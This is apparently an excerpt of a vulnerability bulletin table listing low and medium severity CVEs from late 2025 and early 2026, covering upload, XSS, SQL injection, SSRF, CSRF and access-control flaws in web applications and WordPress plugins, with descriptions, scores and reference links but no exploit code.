| code-projects--Content Management System | A security flaw has been discovered in code-projects/anirbandutta9 Content Management System and News-Buzz 1.0. This vulnerability affects unknown code of the file /admin/editposts.php. Performing manipulation of the argument image results in unrestricted upload. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-29 | 4.7 | CVE-2025-15197 | VDB-338584 \| code-projects/anirbandutta9 Content Management System/News-Buzz editposts.php unrestricted upload VDB-338584 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #724721 \| Code-projects Content Management System v1.0 Arbitrary file upload vulnerability https://github.com/Limingqian123/CVE/issues/7 |
| code-projects--Student File Management System | A vulnerability has been found in code-projects Student File Management System 1.0. The affected element is an unknown function of the file /download.php of the component File Download Handler. The manipulation of the argument store_id leads to improper authorization. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 4.3 | CVE-2025-15213 | VDB-338598 \| code-projects Student File Management System File Download download.php improper authorization VDB-338598 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #725080 \| Code-Projects Student File Management System V1.0 Unauthorized Access https://github.com/Bai-public/CVE/issues/5 https://code-projects.org/ |
| SohuTV--CacheCloud | A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. This affects the function init of the file src/main/java/com/sohu/cache/web/controller/LoginController.java. The manipulation results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 4.3 | CVE-2025-15220 | VDB-338605 \| SohuTV CacheCloud LoginController.java init cross site scripting VDB-338605 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #716320 \| SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/379 |
| Philipinho--Simple-PHP-Blog | A vulnerability was found in Philipinho Simple-PHP-Blog up to 94b5d3e57308bce5dfbc44c3edafa9811893d958. Impacted is an unknown function of the file /login.php. Performing manipulation of the argument Username results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The vendor was contacted early about this disclosure and makes clear that the product is "[f]or educational purposes only". | 2025-12-31 | 4.3 | CVE-2025-15223 | VDB-338608 \| Philipinho Simple-PHP-Blog login.php cross site scripting VDB-338608 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #710150 \| Philipinho Simple-PHP-Blog 1.0 Improper Neutralization of Alternate XSS Syntax https://gitee.com/sun-huizhi/dazhi/issues/IDBUOY |
| 08CMS--Novel System | A security vulnerability has been detected in 08CMS Novel System up to 3.4. This issue affects some unknown processing of the file admina/mtpls.inc.php of the component Template Handler. The manipulation leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-30 | 4.7 | CVE-2025-15250 | VDB-338640 \| 08CMS Novel System Template mtpls.inc.php code injection VDB-338640 \| CTI Indicators (IOB, IOC, TTP, IOA) https://gitee.com/keneny/cve/issues/ID3DEM |
| BiggiDroid--Simple PHP CMS | A security flaw has been discovered in BiggiDroid Simple PHP CMS 1.0. This impacts an unknown function of the file /admin/edit.php of the component Site Logo Handler. Performing manipulation of the argument image results in unrestricted upload. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-12-30 | 4.7 | CVE-2025-15262 | VDB-338656 \| BiggiDroid Simple PHP CMS Site Logo edit.php unrestricted upload VDB-338656 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #725815 \| BiggiDroid Simple PHP CMS 1.0 SQL Injection https://gitee.com/shanyaohei/black-yam/issues/IDGML9 |
| n/a--newbee-mall-plus | A vulnerability was determined in newbee-mall-plus 2.0.0. This impacts the function Upload of the file src/main/java/ltd/newbee/mall/controller/common/UploadController.java of the component Product Information Edit Page. This manipulation of the argument File causes unrestricted upload. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-30 | 4.7 | CVE-2025-15360 | VDB-338744 \| newbee-mall-plus Product Information Edit UploadController.java upload unrestricted upload VDB-338744 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #716785 \| https://github.com/newbee-ltd/newbee-mall-plus newbee-mall-plus 2.0.0 Upload any file https://github.com/zyhzheng500-maker/cve/blob/main/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| n/a--iCMS | A vulnerability was detected in iCMS up to 8.0.0. Affected is the function Save of the file app/config/ConfigAdmincp.php of the component POST Parameter Handler. The manipulation of the argument config results in code injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 4.7 | CVE-2025-15394 | VDB-339163 \| iCMS POST Parameter ConfigAdmincp.php save code injection VDB-339163 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #719029 \| ICMS https://www.icmsdev.com/ 8.0.0 Code Injection https://note-hxlab.wetolink.com/share/QWuWZeAmzUdm |
| n/a--PHPEMS | A vulnerability was detected in PHPEMS up to 11.0. The impacted element is an unknown function. The manipulation results in cross-site request forgery. The attack may be launched remotely. | 2026-01-01 | 4.3 | CVE-2025-15405 | VDB-339325 \| PHPEMS cross-site request forgery VDB-339325 \| CTI Indicators (IOB, IOC) Submit #728314 \| PHPEMS <=11.0 Cross-Site Request Forgery https://byebydoggy.github.io/post/2025/1231-phpems-csrf-poc/ |
| go-sonic--sonic | A flaw has been found in go-sonic sonic up to 1.1.4. The affected element is the function FetchTheme of the file service/theme/git_fetcher.go of the component Theme Fetching API. Executing manipulation of the argument uri can lead to server-side request forgery. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-01 | 4.7 | CVE-2025-15414 | VDB-339335 \| go-sonic Theme Fetching API git_fetcher.go FetchTheme server-side request forgery VDB-339335 \| CTI Indicators (IOB, IOC, IOA) Submit #719789 \| sonic https://github.com/go-sonic/sonic 1.1.4 Server-Side Request Forgery https://note-hxlab.wetolink.com/share/SeCdFaAVlHAJ https://note-hxlab.wetolink.com/share/SeCdFaAVlHAJ#-span--strong-proof-of-concept---strong---span- |
| xnx3--wangmarket | A vulnerability has been found in xnx3 wangmarket up to 6.4. The impacted element is the function uploadImage of the file /sits/uploadImage.do of the component XML File Handler. The manipulation of the argument image leads to unrestricted upload. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-01 | 4.7 | CVE-2025-15415 | VDB-339336 \| xnx3 wangmarket XML File uploadImage.do uploadImage unrestricted upload VDB-339336 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721078 \| xnx3 https://github.com/xnx3/wangmarket <=v6.4 Cross Site Scripting https://github.com/yuccun/CVE/blob/main/wangmarket-Upload2StoredXSS.md |
| n/a--PluXml | A vulnerability was determined in PluXml up to 5.8.22. Affected is the function FileCookieJar::__destruct of the file core/admin/medias.php of the component Media Management Module. Executing manipulation of the argument File can lead to deserialization. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was informed early about this issue and announced that "[w]e fix this issue in the next version 5.8.23". A patch for it is ready. | 2026-01-02 | 4.7 | CVE-2025-15438 | VDB-339383 \| PluXml Media Management medias.php __destruct deserialization VDB-339383 \| CTI Indicators (IOB, IOC, IOA) Submit #713989 \| PluXml 5.8.22 Deserialization Vulnerability https://note-hxlab.wetolink.com/share/9SJUnaDcJuqz |
| n/a--CRMEB | A vulnerability was determined in CRMEB up to 5.6.1. This vulnerability affects unknown code of the file /adminapi/export/product_list. This manipulation of the argument cate_id causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-04 | 4.7 | CVE-2025-15442 | VDB-339464 \| CRMEB product_list sql injection VDB-339464 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721915 \| crmeb v5.6.1 SQL Injection https://github.com/En0t5/vul/blob/main/crmeb/crmeb-export-product_list-SQL.md https://github.com/En0t5/vul/blob/main/crmeb/crmeb-export-product_list-SQL.md#poc |
| n/a--CRMEB | A vulnerability was identified in CRMEB up to 5.6.1. This issue affects some unknown processing of the file /adminapi/product/product_export. Such manipulation of the argument cate_id leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-04 | 4.7 | CVE-2025-15443 | VDB-339465 \| CRMEB product_export sql injection VDB-339465 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721916 \| crmeb v5.6.1 SQL Injection https://github.com/En0t5/vul/blob/main/crmeb/crmeb-product-productExport-SQL.md https://github.com/En0t5/vul/blob/main/crmeb/crmeb-product-productExport-SQL.md#poc |
| Digages--Direct Payments WP | Missing Authorization vulnerability in Digages Direct Payments WP allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Direct Payments WP: from n/a through 1.3.0. | 2025-12-31 | 4.3 | CVE-2025-49339 | https://vdp.patchstack.com/database/wordpress/plugin/direct-payments-wp/vulnerability/wordpress-direct-payments-wp-plugin-1-3-0-broken-access-control-vulnerability?_s_id=cve |
| Digages--Direct Payments WP | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Digages Direct Payments WP allows Retrieve Embedded Sensitive Data. This issue affects Direct Payments WP: from n/a through 1.3.0. | 2025-12-31 | 4.3 | CVE-2025-49340 | https://vdp.patchstack.com/database/wordpress/plugin/direct-payments-wp/vulnerability/wordpress-direct-payments-wp-plugin-1-3-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| YoOhw Studio--Order Cancellation & Returns for WooCommerce | Authorization Bypass Through User-Controlled Key vulnerability in YoOhw Studio Order Cancellation & Returns for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Order Cancellation & Returns for WooCommerce: from n/a through 1.1.10. | 2025-12-31 | 4.3 | CVE-2025-49352 | https://vdp.patchstack.com/database/wordpress/plugin/wc-order-cancellation-return/vulnerability/wordpress-order-cancellation-returns-for-woocommerce-plugin-1-1-10-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mykola Lukin--Orders Chat for WooCommerce | Missing Authorization vulnerability in Mykola Lukin Orders Chat for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Orders Chat for WooCommerce: from n/a through 1.2.0. | 2025-12-31 | 4.3 | CVE-2025-49356 | https://vdp.patchstack.com/database/wordpress/plugin/orders-chat-for-woocommerce/vulnerability/wordpress-orders-chat-for-woocommerce-plugin-1-2-0-broken-access-control-vulnerability?_s_id=cve |
| Priority--Web | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-12-29 | 4.8 | CVE-2025-55062 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Priority--Web | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-12-29 | 4.8 | CVE-2025-55063 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Priority--Web | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') | 2025-12-29 | 4.8 | CVE-2025-55064 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Appointify--Appointify | Cross-Site Request Forgery (CSRF) vulnerability in Appointify allows Cross Site Request Forgery. This issue affects Appointify: from n/a through 1.0.8. | 2025-12-31 | 4.3 | CVE-2025-59130 | https://vdp.patchstack.com/database/wordpress/plugin/appointify/vulnerability/wordpress-appointify-plugin-1-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Jthemes--Genemy | Server-Side Request Forgery (SSRF) vulnerability in Jthemes Genemy allows Server Side Request Forgery. This issue affects Genemy: from n/a through 1.6.6. | 2025-12-31 | 4.9 | CVE-2025-59138 | https://vdp.patchstack.com/database/wordpress/theme/genemy/vulnerability/wordpress-genemy-theme-1-6-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Fahad Mahmood--Easy Upload Files During Checkout | Missing Authorization vulnerability in Fahad Mahmood Easy Upload Files During Checkout allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Upload Files During Checkout: from n/a through 3.0.0. | 2025-12-31 | 4.3 | CVE-2025-62078 | https://vdp.patchstack.com/database/wordpress/plugin/easy-upload-files-during-checkout/vulnerability/wordpress-easy-upload-files-during-checkout-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve |
| Channelize.io Team--Live Shopping & Shoppable Videos For WooCommerce | Cross-Site Request Forgery (CSRF) vulnerability in Channelize.io Team Live Shopping & Shoppable Videos For WooCommerce allows Cross Site Request Forgery. This issue affects Live Shopping & Shoppable Videos For WooCommerce: from n/a through 2.2.0. | 2025-12-31 | 4.3 | CVE-2025-62080 | https://vdp.patchstack.com/database/wordpress/plugin/live-shopping-video-streams/vulnerability/wordpress-live-shopping-shoppable-videos-for-woocommerce-plugin-2-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WP Messiah--BoomDevs WordPress Coming Soon Plugin | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WP Messiah BoomDevs WordPress Coming Soon Plugin allows Retrieve Embedded Sensitive Data. This issue affects BoomDevs WordPress Coming Soon Plugin: from n/a through 1.0.4. | 2025-12-31 | 4.3 | CVE-2025-62083 | https://vdp.patchstack.com/database/wordpress/plugin/coming-soon-by-boomdevs/vulnerability/wordpress-boomdevs-wordpress-coming-soon-plugin-plugin-1-0-4-sensitive-data-exposure-vulnerability?_s_id=cve |
| Imdad Next Web--iNext Woo Pincode Checker | Cross-Site Request Forgery (CSRF) vulnerability in Imdad Next Web iNext Woo Pincode Checker allows Cross Site Request Forgery. This issue affects iNext Woo Pincode Checker: from n/a through 2.3.1. | 2025-12-31 | 4.3 | CVE-2025-62084 | https://vdp.patchstack.com/database/wordpress/plugin/inext-woo-pincode-checker/vulnerability/wordpress-inext-woo-pincode-checker-plugin-2-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Web Builder 143--Sticky Notes for WP Dashboard | Missing Authorization vulnerability in Web Builder 143 Sticky Notes for WP Dashboard allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sticky Notes for WP Dashboard: from n/a through 1.2.4. | 2025-12-31 | 4.3 | CVE-2025-62087 | https://vdp.patchstack.com/database/wordpress/plugin/wb-sticky-notes/vulnerability/wordpress-sticky-notes-for-wp-dashboard-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve |
| MERGADO--Mergado Pack | Cross-Site Request Forgery (CSRF) vulnerability in MERGADO Mergado Pack allows Cross Site Request Forgery. This issue affects Mergado Pack: from n/a through 4.2.0. | 2025-12-31 | 4.3 | CVE-2025-62089 | https://vdp.patchstack.com/database/wordpress/plugin/mergado-marketing-pack/vulnerability/wordpress-mergado-pack-plugin-4-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Approveme--Signature Add-On for Gravity Forms | Missing Authorization vulnerability in Approveme Signature Add-On for Gravity Forms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Signature Add-On for Gravity Forms: from n/a through 1.8.6. | 2025-12-31 | 4.3 | CVE-2025-62099 | https://vdp.patchstack.com/database/wordpress/plugin/gravity-signature-forms-add-on/vulnerability/wordpress-signature-add-on-for-gravity-forms-plugin-1-8-6-broken-access-control-vulnerability?_s_id=cve |
| Omid Shamloo--Pardakht Delkhah | Cross-Site Request Forgery (CSRF) vulnerability in Omid Shamloo Pardakht Delkhah allows Cross Site Request Forgery. This issue affects Pardakht Delkhah: from n/a through 3.0.0. | 2025-12-31 | 4.3 | CVE-2025-62101 | https://vdp.patchstack.com/database/wordpress/plugin/pardakht-delkhah/vulnerability/wordpress-pardakht-delkhah-plugin-3-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Merv Barrett--Import into Easy Property Listings | Cross-Site Request Forgery (CSRF) vulnerability in Merv Barrett Import into Easy Property Listings allows Cross Site Request Forgery. This issue affects Import into Easy Property Listings: from n/a through 2.2.1. | 2025-12-30 | 4.3 | CVE-2025-62112 | https://vdp.patchstack.com/database/wordpress/plugin/easy-property-listings-xml-csv-import/vulnerability/wordpress-import-into-easy-property-listings-plugin-2-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| emendo_seb--Co-marquage service-public.fr | Cross-Site Request Forgery (CSRF) vulnerability in emendo_seb Co-marquage service-public.fr allows Cross Site Request Forgery. This issue affects Co-marquage service-public.fr: from n/a through 0.5.77. | 2025-12-31 | 4.3 | CVE-2025-62113 | https://vdp.patchstack.com/database/wordpress/plugin/co-marquage-service-public/vulnerability/wordpress-co-marquage-service-public-fr-plugin-0-5-77-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ThemeBoy--Hide Plugins | Missing Authorization vulnerability in ThemeBoy Hide Plugins allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hide Plugins: from n/a through 1.0.4. | 2025-12-31 | 4.3 | CVE-2025-62115 | https://vdp.patchstack.com/database/wordpress/plugin/hide-plugins/vulnerability/wordpress-hide-plugins-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve |
| Ink themes--WP Gmail SMTP | Cross-Site Request Forgery (CSRF) vulnerability in Ink themes WP Gmail SMTP allows Cross Site Request Forgery. This issue affects WP Gmail SMTP: from n/a through 1.0.7. | 2025-12-31 | 4.3 | CVE-2025-62123 | https://vdp.patchstack.com/database/wordpress/plugin/wp-gmail-smtp/vulnerability/wordpress-wp-gmail-smtp-plugin-1-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| SiteLock--SiteLock Security | Missing Authorization vulnerability in SiteLock SiteLock Security allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SiteLock Security: from n/a through 5.0.1. | 2025-12-30 | 4.3 | CVE-2025-62128 | https://vdp.patchstack.com/database/wordpress/plugin/sitelock/vulnerability/wordpress-sitelock-security-plugin-5-0-1-broken-access-control-vulnerability?_s_id=cve |
| WPdiscover--Accordion Slider Gallery | Missing Authorization vulnerability in WPdiscover Accordion Slider Gallery allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Accordion Slider Gallery: from n/a through 2.7. | 2025-12-31 | 4.3 | CVE-2025-62130 | https://vdp.patchstack.com/database/wordpress/plugin/accordion-slider-gallery/vulnerability/wordpress-accordion-slider-gallery-plugin-2-7-broken-access-control-vulnerability?_s_id=cve |
| Strategy11 Team--Tasty Recipes Lite | Missing Authorization vulnerability in Strategy11 Team Tasty Recipes Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tasty Recipes Lite: from n/a through 1.1.5. | 2025-12-31 | 4.3 | CVE-2025-62131 | https://vdp.patchstack.com/database/wordpress/plugin/tasty-recipes-lite/vulnerability/wordpress-tasty-recipes-lite-plugin-1-1-5-broken-access-control-vulnerability-2?_s_id=cve |
| Strategy11 Team--Tasty Recipes Lite | Missing Authorization vulnerability in Strategy11 Team Tasty Recipes Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tasty Recipes Lite: from n/a through 1.1.5. | 2025-12-31 | 4.3 | CVE-2025-62132 | https://vdp.patchstack.com/database/wordpress/plugin/tasty-recipes-lite/vulnerability/wordpress-tasty-recipes-lite-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve |
| Manidoraisamy--FormFacade | Cross-Site Request Forgery (CSRF) vulnerability in Manidoraisamy FormFacade allows Cross Site Request Forgery. This issue affects FormFacade: from n/a through 1.4.1. | 2025-12-31 | 4.3 | CVE-2025-62133 | https://vdp.patchstack.com/database/wordpress/plugin/formfacade/vulnerability/wordpress-formfacade-plugin-1-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| nicashmu--Post Video Players | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in nicashmu Post Video Players allows Retrieve Embedded Sensitive Data. This issue affects Post Video Players: from n/a through 1.163. | 2025-12-31 | 4.3 | CVE-2025-62143 | https://vdp.patchstack.com/database/wordpress/plugin/video-playlist-and-gallery-plugin/vulnerability/wordpress-post-video-players-plugin-1-163-sensitive-data-exposure-vulnerability?_s_id=cve |
| Eugen Bobrowski--Robots.txt rewrite | Cross-Site Request Forgery (CSRF) vulnerability in Eugen Bobrowski Robots.txt rewrite allows Cross Site Request Forgery. This issue affects Robots.txt rewrite: from n/a through 1.6.1. | 2025-12-31 | 4.3 | CVE-2025-62148 | https://vdp.patchstack.com/database/wordpress/plugin/robotstxt-rewrite/vulnerability/wordpress-robots-txt-rewrite-plugin-1-6-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Themesawesome--History Timeline | Missing Authorization vulnerability in Themesawesome History Timeline allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects History Timeline: from n/a through 1.0.6. | 2025-12-31 | 4.3 | CVE-2025-62150 | https://vdp.patchstack.com/database/wordpress/plugin/timeline-awesome/vulnerability/wordpress-history-timeline-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve |
| Recorp--AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One | Missing Authorization vulnerability in Recorp AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One: from n/a through 1.1.7. | 2025-12-31 | 4.3 | CVE-2025-62154 | https://vdp.patchstack.com/database/wordpress/plugin/ai-content-writing-assistant/vulnerability/wordpress-ai-content-writing-assistant-content-writer-chatgpt-image-generator-all-in-one-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve |
| Extend Themes--Vireo | Missing Authorization vulnerability in Extend Themes Vireo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Vireo: from n/a through 1.0.24. | 2025-12-31 | 4.3 | CVE-2025-62751 | https://vdp.patchstack.com/database/wordpress/theme/vireo/vulnerability/wordpress-vireo-theme-1-0-24-broken-access-control-vulnerability?_s_id=cve |
| Alexander--AnyComment | Missing Authorization vulnerability in Alexander AnyComment allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AnyComment: from n/a through 0.3.6. | 2025-12-31 | 4.3 | CVE-2025-62874 | https://vdp.patchstack.com/database/wordpress/plugin/anycomment/vulnerability/wordpress-anycomment-plugin-0-3-6-broken-access-control-vulnerability?_s_id=cve |
| Skynet Technologies USA LLC--All in One Accessibility | Missing Authorization vulnerability in Skynet Technologies USA LLC All in One Accessibility allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects All in One Accessibility: from n/a through 1.14. | 2025-12-31 | 4.3 | CVE-2025-63004 | https://vdp.patchstack.com/database/wordpress/plugin/all-in-one-accessibility/vulnerability/wordpress-all-in-one-accessibility-plugin-1-14-broken-access-control-vulnerability?_s_id=cve |
| Serhii Pasyuk--Gmedia Photo Gallery | Cross-Site Request Forgery (CSRF) vulnerability in Serhii Pasyuk Gmedia Photo Gallery allows Cross Site Request Forgery. This issue affects Gmedia Photo Gallery: from n/a through 1.24.1. | 2025-12-31 | 4.3 | CVE-2025-63014 | https://vdp.patchstack.com/database/wordpress/plugin/grand-media/vulnerability/wordpress-gmedia-photo-gallery-plugin-1-24-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Northern Beaches Websites--WP Custom Admin Interface | Missing Authorization vulnerability in Northern Beaches Websites WP Custom Admin Interface allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Custom Admin Interface: from n/a through 7.40. | 2025-12-31 | 4.3 | CVE-2025-63038 | https://vdp.patchstack.com/database/wordpress/plugin/wp-custom-admin-interface/vulnerability/wordpress-wp-custom-admin-interface-plugin-7-40-broken-access-control-vulnerability?_s_id=cve |
| Saad Iqbal--Post Snippets | Cross-Site Request Forgery (CSRF) vulnerability in Saad Iqbal Post Snippets allows Cross Site Request Forgery. This issue affects Post Snippets: from n/a through 4.0.11. | 2025-12-31 | 4.3 | CVE-2025-63040 | https://vdp.patchstack.com/database/wordpress/plugin/post-snippets/vulnerability/wordpress-post-snippets-plugin-4-0-11-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Crocoblock--JetPopup | Authorization Bypass Through User-Controlled Key vulnerability in Crocoblock JetPopup allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects JetPopup: from n/a through 2.0.20.1. | 2025-12-29 | 4.3 | CVE-2025-68502 | https://vdp.patchstack.com/database/wordpress/plugin/jet-popup/vulnerability/wordpress-jetpopup-plugin-2-0-20-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| HETWORKS--WordPress Image shrinker | Server-Side Request Forgery (SSRF) vulnerability in HETWORKS WordPress Image shrinker allows Server Side Request Forgery. This issue affects WordPress Image shrinker: from n/a through 1.1.0. | 2025-12-29 | 4.9 | CVE-2025-68893 | https://vdp.patchstack.com/database/wordpress/plugin/wp-image-shrinker/vulnerability/wordpress-wordpress-image-shrinker-plugin-1-1-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, Magick fails to check for circular references between two MVGs, leading to a stack overflow. This is a DoS vulnerability, and any situation that allows reading the mvg file will be affected. Version 7.1.2-12 fixes the issue. | 2025-12-30 | 4 | CVE-2025-68950 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7rvh-xqp3-pr8j https://github.com/ImageMagick/ImageMagick/commit/204718c2211903949dcfc0df8e65ed066b008dec |
| HemmeligOrg--Hemmelig.app | Hemmelig is a messaging app with client-side encryption and self-destructing messages. Prior to version 7.3.3, a Server-Side Request Forgery (SSRF) filter bypass vulnerability exists in the webhook URL validation of the Secret Requests feature. The application attempts to block internal/private IP addresses but can be bypassed using DNS rebinding or open redirect services. This allows an authenticated user to make the server initiate HTTP requests to internal network resources. Version 7.3.3 contains a patch for the issue. | 2025-12-29 | 4.3 | CVE-2025-69206 | https://github.com/HemmeligOrg/Hemmelig.app/security/advisories/GHSA-vvxf-wj5w-6gj5 https://github.com/HemmeligOrg/Hemmelig.app/commit/6c909e571d0797ee3bbd2c72e4eb767b57378228 |
| libsodium--libsodium | libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren't in the main cryptographic group. | 2025-12-31 | 4.5 | CVE-2025-69277 | https://github.com/jedisct1/libsodium/commit/ad3004ec8731730e93fcfbbc824e67eadc1c1bae https://00f.net/2025/12/30/libsodium-vulnerability/ https://news.ycombinator.com/item?id=46435614 https://ianix.com/pub/ed25519-deployment.html |
| makeplane--plane | Plane is an open-source project management tool. In plane.io, a guest user does not have permission to access https[:]//app[.]plane[.]so/[:]slug/settings. Prior to Plane version 1.2.0, the `/api/workspaces/:slug/members/` endpoint is accessible to guests and lists the users of a workspace they have joined. Since the `display_name` in the response is actually the handle of the email address, a malicious guest can still identify admin users' email addresses. Version 1.2.0 fixes this issue. | 2026-01-02 | 4.3 | CVE-2025-69284 | https://github.com/makeplane/plane/security/advisories/GHSA-7qx6-6739-c7qr |
| code-projects--Content Management System | A security vulnerability has been detected in code-projects Content Management System 1.0. Impacted is an unknown function of the file /admin/edit_posts.php. The manipulation of the argument image leads to unrestricted upload. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. | 2026-01-02 | 4.7 | CVE-2026-0566 | VDB-339378 | code-projects Content Management System edit_posts.php unrestricted upload VDB-339378 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729228 | Code-projects Content Management System v1.0 Arbitrary file upload vulnerability https://github.com/Limingqian123/CVE/issues/13 https://code-projects.org/ |
| yeqifu--warehouse | A security flaw has been discovered in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. Affected by this issue is the function createResponseEntity of the file warehouse\src\main\java\com\yeqifu\sys\common\AppFileUtils.java. The manipulation of the argument path results in path traversal. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. | 2026-01-02 | 4.3 | CVE-2026-0571 | VDB-339385 | yeqifu warehouse AppFileUtils.java createResponseEntity path traversal VDB-339385 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729331 | yeqifu warehouse aaf29962ba407d22d991781de28796ee7b4670e4 Arbitrary File Read https://github.com/5i1encee/Vul/blob/main/Arbitrary%20File%20Read%20Vulnerability%20in%20Project%20yeqifu%20warehouse.md https://github.com/5i1encee/Vul/blob/main/Arbitrary%20File%20Read%20Vulnerability%20in%20Project%20yeqifu%20warehouse.md#poc |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| elinicksic--Razgover | A security vulnerability has been detected in elinicksic Razgover up to db37dfc5c82f023a40f2f7834ded6633fb2b5262. This affects an unknown part of the file Chattify/send.php of the component Chat Message Handler. Such manipulation of the argument msg leads to cross site scripting. The attack may be performed remotely. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The name of the patch is 995dd89d0e3ec5522966724be23a5d58ca1bdac3. Applying a patch is advised to resolve this issue. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-31 | 3.5 | CVE-2019-25262 | VDB-338649 | elinicksic Razgover Chat Message send.php cross site scripting VDB-338649 | CTI Indicators (IOB, IOC, TTP, IOA) https://github.com/elinicksic/Razgover/commit/995dd89d0e3ec5522966724be23a5d58ca1bdac3 |
